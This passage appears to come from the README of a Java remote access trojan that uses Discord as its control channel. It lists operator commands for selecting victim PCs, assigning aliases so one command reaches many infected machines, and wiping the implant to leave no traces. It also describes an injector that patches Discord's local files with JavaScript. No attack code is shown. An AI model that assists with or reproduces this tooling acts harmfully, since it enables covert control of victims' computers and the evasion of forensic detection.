Florian7T/discord-rat-java/README.md

 - /isolate <id/alias>: select a pc (or pcs if they have the same alias and you input that alias)
 - /alias <bot_id> <alias> &amp; /whois <alias>: give victim pcs an alias (makes it easier in the C&amp;C) -- multiple pcs can have the same nickname (making you able to run a command on multiple pcs) but since they keep their unique ID you wont be stuck looking for which is which
 - /notrace: removes itself and the injection from the victims pc leaving no traces

+The injector is just a basic js injection into one of discord's local files using subprocess.
+Look into it Idk if it works I just pasted some stuff I used in another program into that file.